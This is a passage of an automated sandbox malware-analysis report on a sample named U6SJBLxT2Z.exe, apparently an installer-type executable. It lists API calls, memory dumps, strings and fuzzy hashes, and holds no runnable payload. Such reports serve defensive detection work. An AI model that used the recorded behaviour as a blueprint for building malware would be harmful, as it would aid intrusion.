                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                  • DrawTextW.USER32(00000000,00433F00,?,00000010,00000820), ref: 00401156
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                                  • Opcode ID: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                                                                                                                                  • Instruction ID: eaab19ccb9cda740c31967da28403833e1322962c0e6ee158e4036cb66a51054
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b27a2b551f63a02a5ae57bcc50d46a19120317da1eaca0d31fe5953092f3d4ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED418B71800209AFCF058FA5CE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061F8,?,?), ref: 00406098
                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004060A1
                                                                                                                                                                                                    • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                    • Part of subcall function 00405E6C: lstrlenA.KERNEL32(00000000,?,00000000,00406151,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EAE
                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004060BE
                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004060DC
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00406117
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406126
                                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040615E
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004061B4
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004061C5
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061CC
                                                                                                                                                                                                    • Part of subcall function 00405F07: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\U6SJBLxT2Z.exe,80000000,?,?,?,00000009,?), ref: 00405F0B
                                                                                                                                                                                                    • Part of subcall function 00405F07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000009,?), ref: 00405F2D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                                                                                  • Opcode ID: 9b519c14120aa80628a1efb59fa06e72263f7c501841ac8fb024acedf13bc814
                                                                                                                                                                                                  • Instruction ID: d46549913b6b20842cf1787bef5cc60fb31ae9cbf3b8bb231415db86ef2d3bba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b519c14120aa80628a1efb59fa06e72263f7c501841ac8fb024acedf13bc814
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D3135712017157BD2206B218D48F6B3A5CDF45754F15003AFE82FA2C3DA3CE9218ABD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00406723
                                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,?,00000009,?), ref: 00406732
                                                                                                                                                                                                  • CharNextW.USER32(?,00000000,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 00406737
                                                                                                                                                                                                  • CharPrevW.USER32(?,?,75D43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U6SJBLxT2Z.exe",004034A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,?,00000009,?), ref: 0040674A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004066C1
                                                                                                                                                                                                  • *?|<>/":, xrefs: 00406712
                                                                                                                                                                                                  • "C:\Users\user\Desktop\U6SJBLxT2Z.exe", xrefs: 004066C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\U6SJBLxT2Z.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                  • API String ID: 589700163-3472738217
                                                                                                                                                                                                  • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                                  • Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                  • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                  • Instruction ID: dd0feedb065fecc26b382c70af4fe1a3d395924493241b124500faa7aa9dc668
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C2174B15007059BCB30DF78DA08B5BBBF8AF81714B05892EE992B26E1D734E904DB58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                                                                                                                    • Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                  • String ID: 9
                                                                                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                                                                                  • Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                                                                                                                                  • Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
                                                                                                                                                                                                  • GetMessagePos.USER32 ref: 00404D45
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404D5F
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                  • Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F772238,?,00000808), ref: 6F771635
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F772238,?,00000808), ref: 6F77163C
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,6F772238,?,00000808), ref: 6F771650
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(8"wo,00000000), ref: 6F771657
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F771660
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                  • String ID: 8"wo
                                                                                                                                                                                                  • API String ID: 1148316912-2455834148
                                                                                                                                                                                                  • Opcode ID: 3c926e393fbecd14ef57a74f175911d05c0b49cc6c3289d33e7de92b6c32a8ef
                                                                                                                                                                                                  • Instruction ID: 4e9eab76cd573151ec97e146b21809cf5573dc6eb9d48d5ce6ed1a206cd1badb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c926e393fbecd14ef57a74f175911d05c0b49cc6c3289d33e7de92b6c32a8ef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40F01272116538BBDA201AA68C4CC9B7E9CEFCB2F5B110662F6189119096615C11D7F1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                                                                                                                  • MulDiv.KERNEL32(0005D646,00000064,?), ref: 00402F74
                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00402F84
                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924672559.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                                  • Opcode ID: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                                                                                                                                                  • Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 6F77121B: GlobalAlloc.KERNELBASE(00000040,?,6F77123B,?,6F7712DF,00000019,6F7711BE,-000000A0), ref: 6F771225
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6F7726A3
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6F7726D8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11940201311.000000006F771000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F770000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940166905.000000006F770000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940233617.000000006F774000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11940257605.000000006F776000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6f770000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                                                                  • Opcode ID: 5ca5bad6bfc5c39fb1fdd4f0fce152ce012cb95f7d872eebd305486802d8c9d7
                                                                                                                                                                                                  • Instruction ID: 086e5047b0fd4eab17a8c08fcfd80e2179c40d971bfa810d04d6a4d945694f16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca5bad6bfc5c39fb1fdd4f0fce152ce012cb95f7d872eebd305486802d8c9d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4318C31624611EBCF258F68DE98C2B77B6FB86314714467BE220C7660CF31A855DFA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.11924413869.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924389812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924439925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.11924465688.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
